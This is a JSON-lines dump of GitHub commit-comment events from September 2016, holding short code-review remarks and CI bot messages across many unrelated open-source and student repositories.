{"id":"4521357860","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18911055,"position":3,"line":3,"path":"src/module04/homework/task1/BanSystem.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:38:45Z","updated_at":"2016-09-06T13:38:45Z","body":"rename to BankSystem, you are lost \"k\""}},"created_at":"2016-09-06T13:38:45Z"}
{"id":"4521358711","type":"CommitCommentEvent","actor":{"login":"kylebrandt"},"repo":{"name":"koekeishiya/kwm"},"payload":{"comment":{"id":18911059,"position":null,"line":null,"path":null,"commit_id":"7ab57595e77c209730a422f33a180706e9b84b2b","created_at":"2016-09-06T13:38:54Z","updated_at":"2016-09-06T13:38:54Z","body":"@koekeishiya I was about to file an issue about SystemUIServer taking up 10GB of memory over time. I also had some icons in the dock that lingered as well (Electron and X11 app icons that were closed). Going to build with this new commit and hope that is what was happening :)"}},"created_at":"2016-09-06T13:38:54Z"}
{"id":"4521360372","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18911064,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T13:39:14Z","updated_at":"2016-09-06T13:39:14Z","body":"UURRRG. Yeah, I would still say so, because that null value is _WRONG_. That should be an empty `List`. I will actually send a PR for that, because it is that annoying."}},"created_at":"2016-09-06T13:39:14Z"}
{"id":"4521361479","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18911067,"position":68,"line":68,"path":"src/module04/homework/task1/Bank.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:39:26Z","updated_at":"2016-09-06T13:39:26Z","body":"лишний отступ"}},"created_at":"2016-09-06T13:39:26Z"}
{"id":"4521364974","type":"CommitCommentEvent","actor":{"login":"mikedurbin"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18911073,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T13:40:05Z","updated_at":"2016-09-06T13:40:05Z","body":"In that scenario, we'll only have to update our serialization format if we decide that in a new version of the fedora spec that there may be multiple descriptions, all which are given URLs that appear to be contained within the binary.  It does mean that if/when we search the world for \"fcr:metdata\" when we finally excise it from all of our code bases, we wont' be able to find this special handling with an IDE or grep."}},"created_at":"2016-09-06T13:40:05Z"}
{"id":"4521365882","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18911081,"position":null,"line":null,"path":null,"commit_id":"a73e1ad0998703e4a960e80b1c4c4121cf8dfd6f","created_at":"2016-09-06T13:40:15Z","updated_at":"2016-09-06T13:40:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 924](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12671&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:51"}},"created_at":"2016-09-06T13:40:15Z"}
{"id":"4521365941","type":"CommitCommentEvent","actor":{"login":"thinkh"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":18911082,"position":null,"line":null,"path":null,"commit_id":"5ff29f3efa23b4ce244fbd095be15b04f52e808b","created_at":"2016-09-06T13:40:16Z","updated_at":"2016-09-06T13:40:16Z","body":"I don't know that. It seems that there is a bug in `parseMatrix` or I don't know either how it's meant to work."}},"created_at":"2016-09-06T13:40:16Z"}
{"id":"4521366388","type":"CommitCommentEvent","actor":{"login":"eanjum"},"repo":{"name":"OpenAMP/open-amp"},"payload":{"comment":{"id":18911083,"position":4,"line":69,"path":"lib/common/hil.c","commit_id":"01dea28cce078e1b4da0fc0007c50a72231799a5","created_at":"2016-09-06T13:40:20Z","updated_at":"2016-09-06T13:40:20Z","body":"@wjliang \r\n\r\nSome comments/Feedback on the API parameters changes, platform data representation and remoteproc platform drivers etc.\r\n\r\n1. I suggest that we should not standardize the format in which platform data is maintained by the application and environment layer. There is a distinction between representation of data within OpenAMP(defined by the HIL proc) compared to the one required by the environment/application layers. The application must understand the OpenAMP requirements but not the other way round. We can define an interface  which will allow environment/applications to pass the platform information to OpenAMP. This will effectively decouple the different representations of data. The interface could comprise of multiple functions, allowing user to populate each and every field in \"hil_proc\" structure or just a single call which will add the new \"hil_proc\" instance to procs list maintained by the HIL.  To alleviate the  implementation the application/environment layer can chose to use the hil_proc structure for its data representation, specially for BME.\r\n2. Looking at the echo test application, the platform data control block is different for master and remote applications. Master uses \"struct hil_proc\" whereas remote uses \"struct rproc_info_plat_local\" and which introduces an asymmetry. If we intend to standardize the format then both master and remote should use the same control block.\r\n\r\nIMO, the same behavior can be achieved without any parameter changes and structure parsing within the OpenAMP code. Based on aforementioned points, I have created a patch (enclosed). This is incomplete but reflects my line of thinking. Please let me know what do you think. If you agree then I will provide the complete patch.\r\n[0001-Suggested-changes-to-prevent-APIs-parameters-modific.txt](https://github.com/OpenAMP/open-amp/files/456793/0001-Suggested-changes-to-prevent-APIs-parameters-modific.txt)\r\n"}},"created_at":"2016-09-06T13:40:20Z"}
{"id":"4521374572","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18911106,"position":null,"line":null,"path":null,"commit_id":"25c213c9c18b1d3c741c119ea34868f8c611c78f","created_at":"2016-09-06T13:41:41Z","updated_at":"2016-09-06T13:41:41Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/411/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1969)."}},"created_at":"2016-09-06T13:41:41Z"}
{"id":"4521376984","type":"CommitCommentEvent","actor":{"login":"maibru"},"repo":{"name":"maibru/maibru.github.io"},"payload":{"comment":{"id":18911111,"position":null,"line":null,"path":null,"commit_id":"aff0c363de69560932a12a43582a1e648b6fb800","created_at":"2016-09-06T13:42:08Z","updated_at":"2016-09-06T13:42:08Z","body":"Hola Mundo\r\nEsta es mi pagina de prueba"}},"created_at":"2016-09-06T13:42:08Z"}
{"id":"4521377101","type":"CommitCommentEvent","actor":{"login":"hutomoajip10"},"repo":{"name":"hutomoajip10/ASD_Task_1"},"payload":{"comment":{"id":18911112,"position":39,"line":47,"path":"asd_task_1.cpp","commit_id":"0073c4c7c10b31b99c8aae8b0aab852a337f16b9","created_at":"2016-09-06T13:42:09Z","updated_at":"2016-09-06T13:42:09Z","body":"n"}},"created_at":"2016-09-06T13:42:09Z"}
{"id":"4521379294","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18911117,"position":null,"line":null,"path":null,"commit_id":"116b49b8a3a30099309a077fe2babe84db710d33","created_at":"2016-09-06T13:42:31Z","updated_at":"2016-09-06T13:42:31Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#E9kslMURQhOW916YR9PkUQ"}},"created_at":"2016-09-06T13:42:31Z"}
{"id":"4521379375","type":"CommitCommentEvent","actor":{"login":"maibru"},"repo":{"name":"maibru/maibru.github.io"},"payload":{"comment":{"id":18911118,"position":null,"line":null,"path":null,"commit_id":"aff0c363de69560932a12a43582a1e648b6fb800","created_at":"2016-09-06T13:42:32Z","updated_at":"2016-09-06T13:42:32Z","body":"Escribiendo"}},"created_at":"2016-09-06T13:42:32Z"}
{"id":"4521379414","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-2"},"payload":{"comment":{"id":18911119,"position":6,"line":44,"path":"artwork-api/src/main/webapp/src/modules/artist/artist.mod.js","commit_id":"b99bcba5b6c0b7954b4c35c410612c7289d2df5c","created_at":"2016-09-06T13:42:32Z","updated_at":"2016-09-06T13:42:32Z","body":"Tipo deberia ser un entero no una referencia"}},"created_at":"2016-09-06T13:42:32Z"}
{"id":"4521384096","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":18911135,"position":42,"line":171,"path":"pkg/cmd/server/origin/master_config.go","commit_id":"e8e488f19c50d79d3f1c038df743f70e196fa95c","created_at":"2016-09-06T13:43:21Z","updated_at":"2016-09-06T13:43:21Z","body":"In etcd3 they are effectively free.  The availability problem is still\nthere, so we have a fallback.  I'm thinking we need to cache service\ntoken auth lookups for a short time anyway - we could add a circuit\nbreaker that moves to any peer.\n"}},"created_at":"2016-09-06T13:43:21Z"}
{"id":"4521388321","type":"CommitCommentEvent","actor":{"login":"kvch"},"repo":{"name":"bkil-syslogng/syslog-ng"},"payload":{"comment":{"id":18911144,"position":null,"line":null,"path":null,"commit_id":"9dad1cb2d4e02d302fbc9a7bffc772606179235d","created_at":"2016-09-06T13:44:04Z","updated_at":"2016-09-06T13:44:04Z","body":"The idea of printing the diff in Travis was discarded, because the team found it unnecessary.\r\nI understand that it helped you fixing the style problems. But the workflow of this script is that you run `make style-check` to see if there is a problem with the code. Then if the formatting is not valid, `make style-format` needs to be run. I understand that this idea was born because if someone cannot install the required `astyle`, but we decided that everyone who contributes to syslog-ng OSE should know how to install the required version of `astyle`.\r\n\r\nBut, in the end if we still want the diff function, this is not the way to implement it. A simple `git diff` should be added to the check function and that's all."}},"created_at":"2016-09-06T13:44:04Z"}
{"id":"4521388981","type":"CommitCommentEvent","actor":{"login":"tahonermann"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18911145,"position":15,"line":15,"path":"cmake/Modules/FindCMCSTL2.cmake","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T13:44:13Z","updated_at":"2016-09-06T13:44:13Z","body":"I spent quite a bit of time researching the \"right\" way to define cmake \"find\" modules.  I eventually came across the documentation at [1] that describes the expected conventions.  That doc states to use the <tt>..._INCLUDE_DIRS</tt> name.  From the various things I've read, I get the impression that there has been some lack of consistency in following these guidelines and/or that the guidelines have changed over time.  When/if a library is required, then the find module will need to be updated to also set the <tt>CMCSTL2_LIBRARY_DIRS</tt> and <tt>CMCSTL2_LIBRARIES</tt> cache variables.\r\n\r\nCMCSTL2 doesn't appear to provide install targets, but it might at some point.  My goal in using the name <tt>CMCSTL2_INSTALL_PATH</tt> was that it would hopefully work for some future installed location as well.  In the meantime, yes, a git clone **is** an \"installation\".  Note that <tt>CMCSTL2_INSTALL_PATH</tt> doesn't need to point to the <tt>include</tt> directory; the <tt>/include</tt> path suffix will ensure that <tt>cmake</tt> searches in the subdirectory.\r\n\r\n[1]: https://cmake.org/cmake/help/v3.0/manual/cmake-developer.7.html#find-modules"}},"created_at":"2016-09-06T13:44:13Z"}
{"id":"4521390992","type":"CommitCommentEvent","actor":{"login":"select-artur"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18911148,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T13:44:31Z","updated_at":"2016-09-06T13:44:31Z","body":"But I'm not sure that we can fix it. Because it is the partial match feature restriction. We can't ordering with partial match."}},"created_at":"2016-09-06T13:44:31Z"}
{"id":"4521392546","type":"CommitCommentEvent","actor":{"login":"vinny1993"},"repo":{"name":"vinny1993/helloworld"},"payload":{"comment":{"id":18911155,"position":null,"line":null,"path":null,"commit_id":"2d3b6c427a35d45368aa7db28232e99781c67454","created_at":"2016-09-06T13:44:47Z","updated_at":"2016-09-06T13:44:47Z","body":"am happy for joining github\r\n"}},"created_at":"2016-09-06T13:44:47Z"}
{"id":"4521394818","type":"CommitCommentEvent","actor":{"login":"jensan13"},"repo":{"name":"jensan13/hello-world"},"payload":{"comment":{"id":18911162,"position":2,"line":2,"path":"README.md","commit_id":"b7eb1ab201dd744809b33228232edc3b70d537c0","created_at":"2016-09-06T13:45:16Z","updated_at":"2016-09-06T13:45:16Z","body":":turtle: "}},"created_at":"2016-09-06T13:45:16Z"}
{"id":"4521397854","type":"CommitCommentEvent","actor":{"login":"ericbeesd"},"repo":{"name":"ericbeesd/WexTest"},"payload":{"comment":{"id":18911169,"position":5,"line":11,"path":"Prog/Templates/wexdefault/frmLoginMenu.html","commit_id":"fdc86f36979618e7edce2ecfea4cfb6177e142a3","created_at":"2016-09-06T13:45:48Z","updated_at":"2016-09-06T13:45:48Z","body":"uitgezet"}},"created_at":"2016-09-06T13:45:48Z"}
{"id":"4521401373","type":"CommitCommentEvent","actor":{"login":"jdcasey"},"repo":{"name":"ligangty/galley"},"payload":{"comment":{"id":18911172,"position":18,"line":18,"path":"caches/infinispan/src/main/java/org/commonjava/maven/galley/cache/routes/RoutingCacheProviderWrapper.java","commit_id":"0a216e31578174700d170b87173ec6f964b86390","created_at":"2016-09-06T13:46:24Z","updated_at":"2016-09-06T13:46:24Z","body":"Yep, I think it makes sense to merge the functionality in CacheProviderRouter into this class. I think you'll need something that *works similarly to* SpecialPathManager, but isn't quite the same thing...basically, just an interface that will return true/false for whether the resource should use a particular provider.\r\n\r\nMost of the methods in this class will simply delegate to the selected provider, so it's going to look a lot like it does now...but we don't need the CacheProviderRouter to be a separate class, I guess.\r\n\r\nFor things you have marked as FIXME below, those should go through all providers and call the method on each one (startReporting/stopReporting, cleanupCurrentThread, etc) since they're maintenance / house-keeping methods."}},"created_at":"2016-09-06T13:46:24Z"}
{"id":"4521410013","type":"CommitCommentEvent","actor":{"login":"core23"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18911195,"position":null,"line":null,"path":null,"commit_id":"b044f44de9c3a059726338dfa7441a7cde84c77d","created_at":"2016-09-06T13:47:52Z","updated_at":"2016-09-06T13:47:52Z","body":"It was done in the dev-master branch, which would allow code breaking!"}},"created_at":"2016-09-06T13:47:52Z"}
{"id":"4521414525","type":"CommitCommentEvent","actor":{"login":"nick1n"},"repo":{"name":"nick1n/nicholast.fm"},"payload":{"comment":{"id":18911203,"position":null,"line":null,"path":null,"commit_id":"a4483374832dfc24fef5528614b00e83faddaab2","created_at":"2016-09-06T13:48:38Z","updated_at":"2016-09-06T13:48:38Z","body":"*Version bump to v0.4.5"}},"created_at":"2016-09-06T13:48:38Z"}
{"id":"4521415732","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18911204,"position":15,"line":15,"path":"cmake/Modules/FindCMCSTL2.cmake","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T13:48:50Z","updated_at":"2016-09-06T13:48:50Z","body":"Ah, okay, you've clearly done much more homework on this than I have! :-)"}},"created_at":"2016-09-06T13:48:50Z"}
{"id":"4521416081","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18911205,"position":null,"line":null,"path":null,"commit_id":"4970f95c8305cf06c91b741068b4d1a2c73dbc02","created_at":"2016-09-06T13:48:53Z","updated_at":"2016-09-06T13:48:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 925](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12674&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 244, ignored: 3 Build time: 00:10:13"}},"created_at":"2016-09-06T13:48:53Z"}
{"id":"4521416915","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"skjnldsv/dotfiles"},"payload":{"comment":{"id":18911211,"position":null,"line":null,"path":null,"commit_id":"e553f25049bca6cbb7da26d5b538e3253639da63","created_at":"2016-09-06T13:49:02Z","updated_at":"2016-09-06T13:49:02Z","body":"Changed theme, changed palette and added vpn current country."}},"created_at":"2016-09-06T13:49:02Z"}
{"id":"4521427924","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911230,"position":null,"line":null,"path":null,"commit_id":"90231ed67fdba4b996b442f3421d872a1c2a1a16","created_at":"2016-09-06T13:50:50Z","updated_at":"2016-09-06T13:50:50Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:50:50Z"}
{"id":"4521427999","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911231,"position":null,"line":null,"path":null,"commit_id":"2652715b236e78b2712cdab5e6c06f8f1dd0e49b","created_at":"2016-09-06T13:50:51Z","updated_at":"2016-09-06T13:50:51Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:50:51Z"}
{"id":"4521431892","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18911241,"position":null,"line":null,"path":null,"commit_id":"6309dc95ba0435cd422112f7cccb224c80bccfaa","created_at":"2016-09-06T13:51:32Z","updated_at":"2016-09-06T13:51:32Z","body":"Хорошо"}},"created_at":"2016-09-06T13:51:32Z"}
{"id":"4521436536","type":"CommitCommentEvent","actor":{"login":"wdpypere"},"repo":{"name":"quattor/aii"},"payload":{"comment":{"id":18911256,"position":null,"line":null,"path":null,"commit_id":"8aee679da1d35619bfb4ed5004b39ca1a2ffef80","created_at":"2016-09-06T13:52:19Z","updated_at":"2016-09-06T13:52:19Z","body":"if you remove the ```=over``` here, you'll have to remove a ```=back``` a bit further as well."}},"created_at":"2016-09-06T13:52:19Z"}
{"id":"4521438068","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18911268,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T13:52:33Z","updated_at":"2016-09-06T13:52:33Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-06T13:52:33Z"}
{"id":"4521438752","type":"CommitCommentEvent","actor":{"login":"gao-yan"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911270,"position":9,"line":529,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"11c1ead3062b04ac01f661e217428e7352b53250","created_at":"2016-09-06T13:52:40Z","updated_at":"2016-09-06T13:52:40Z","body":"\"systemd\" resource type ;)"}},"created_at":"2016-09-06T13:52:40Z"}
{"id":"4521441796","type":"CommitCommentEvent","actor":{"login":"Spriz"},"repo":{"name":"digital2go/cakephp-tinyauth"},"payload":{"comment":{"id":18911279,"position":null,"line":null,"path":null,"commit_id":"a021307ef50b5b45d416629ed9efb5929c5c722a","created_at":"2016-09-06T13:53:12Z","updated_at":"2016-09-06T13:53:12Z","body":"Well done - very much awaited change to the original plugin 😅 "}},"created_at":"2016-09-06T13:53:12Z"}
{"id":"4521442011","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18911281,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T13:53:14Z","updated_at":"2016-09-06T13:53:14Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2319 of 2326 tests passed, 24 test warnings)\n\n * 31 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T13:53:14Z"}
{"id":"4521442946","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaOpt/Mosek.jl"},"payload":{"comment":{"id":18911285,"position":7,"line":9,"path":"deps/build.jl","commit_id":"c471393eb3e61ee7749e0ea2a0fc909c5eaee1db","created_at":"2016-09-06T13:53:22Z","updated_at":"2016-09-06T13:53:22Z","body":"`:x86` is not what this will be on 32 bit systems"}},"created_at":"2016-09-06T13:53:22Z"}
{"id":"4521444594","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911294,"position":null,"line":null,"path":null,"commit_id":"15368c7f9d7d2ad7e204a3bdc3660b274a8e4699","created_at":"2016-09-06T13:53:37Z","updated_at":"2016-09-06T13:53:37Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:53:37Z"}
{"id":"4521444637","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911295,"position":null,"line":null,"path":null,"commit_id":"a7d1fe59a470b8588e6ecdb28d3f7cbfa5ac90fb","created_at":"2016-09-06T13:53:37Z","updated_at":"2016-09-06T13:53:37Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:53:37Z"}
{"id":"4521444978","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":18911297,"position":null,"line":null,"path":null,"commit_id":"71aab9098eeb85767bf76a6294c9b3780bdb73ea","created_at":"2016-09-06T13:53:41Z","updated_at":"2016-09-06T13:53:41Z","body":"This updates libtool which has proper lib versioning for android. So libs built for droid no longer have named versioning. \r\n\r\nAndroid still does not support versioned libs. Regardless of who loads the lib.\r\n\r\nhttps://github.com/xbmc/xbmc/pull/9308\r\nhttps://github.com/MrMC/mrmc/commit/5f5f243552058a88b5da02152c8811afe794cca1\r\n\r\nJust never fixed it for curl :) It would barf but the -f prevented make fail. "}},"created_at":"2016-09-06T13:53:41Z"}
{"id":"4521446683","type":"CommitCommentEvent","actor":{"login":"reinierl"},"repo":{"name":"thenewmotion/ocpp"},"payload":{"comment":{"id":18911304,"position":39,"line":105,"path":"ocpp-json/src/main/scala/com/thenewmotion/ocpp/json/WebSocketConnection.scala","commit_id":"bd788175617b78a1a5eef4e99220397b510f6d17","created_at":"2016-09-06T13:53:59Z","updated_at":"2016-09-06T13:53:59Z","body":"Better log and not handle message whenever we get an unencrypted message on an encrypted connection or vice-versa"}},"created_at":"2016-09-06T13:53:59Z"}
{"id":"4521452599","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18911318,"position":21,"line":32,"path":"band-web/src/main/webapp/WEB-INF/web.xml","commit_id":"b7682c258f36ef4272e5521b2936dd7b6f426966","created_at":"2016-09-06T13:54:54Z","updated_at":"2016-09-06T13:54:54Z","body":"`VenueService`?"}},"created_at":"2016-09-06T13:54:54Z"}
{"id":"4521453354","type":"CommitCommentEvent","actor":{"login":"alfredosalas"},"repo":{"name":"afmontanar/xbaseSqlAdi"},"payload":{"comment":{"id":18911320,"position":null,"line":null,"path":null,"commit_id":"98553983712fa21ef345e1ab403aee30d2a8fbd6","created_at":"2016-09-06T13:55:02Z","updated_at":"2016-09-06T13:55:02Z","body":"update pg_database set encoding=6 where datname='adicnet'; // encoding=6 utf8\r\nupdate pg_database set encoding=8 where datname='adicnet'; // encoding=8 latin1\r\n\r\npostgrest 8.4/9.0 no carga las extensiones automaticamente\r\nhay que hacerlo de esta manera de acuerdo a la extensión\r\n-- http://crafted-software.blogspot.com.co/2011/10/extensions-in-postgres.html\r\n-- Postgres 8.4/9.0\r\n-- CREATE OR REPLACE FUNCTION uuid_generate_v1()\r\n   RETURNS uuid\r\n   AS '$libdir/uuid-ossp', 'uuid_generate_v1'\r\n   VOLATILE STRICT LANGUAGE C;\r\n-- Postgres 9.1\r\n-- CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\";\r\n"}},"created_at":"2016-09-06T13:55:02Z"}
{"id":"4521454659","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18911323,"position":null,"line":null,"path":null,"commit_id":"6620b0bef2eabcfb268bc8b989e1b9dd95a824fa","created_at":"2016-09-06T13:55:16Z","updated_at":"2016-09-06T13:55:16Z","body":"I think the climbing slowness issues we  used to have were caused by a different bug which has been fixed now. I believe that was related to async file operations being handled in a way that caused the threadpool to not realise it was full and new threads should be started.\r\n\r\n"}},"created_at":"2016-09-06T13:55:16Z"}
{"id":"4521455001","type":"CommitCommentEvent","actor":{"login":"yamorad"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":18911327,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-06T13:55:20Z","updated_at":"2016-09-06T13:55:20Z","body":"[Casos de Uso formato extendido MIKEBOL.docx](https://github.com/carlosbalamba/MIKEBOL/files/456849/Casos.de.Uso.formato.extendido.MIKEBOL.docx)\r\n\r\n"}},"created_at":"2016-09-06T13:55:20Z"}
{"id":"4521455202","type":"CommitCommentEvent","actor":{"login":"genedavis"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":18911328,"position":null,"line":null,"path":null,"commit_id":"d2a6a6f6ca1a34a09356cc027b8066e60c8e7e0a","created_at":"2016-09-06T13:55:22Z","updated_at":"2016-09-06T13:55:22Z","body":"+1"}},"created_at":"2016-09-06T13:55:22Z"}
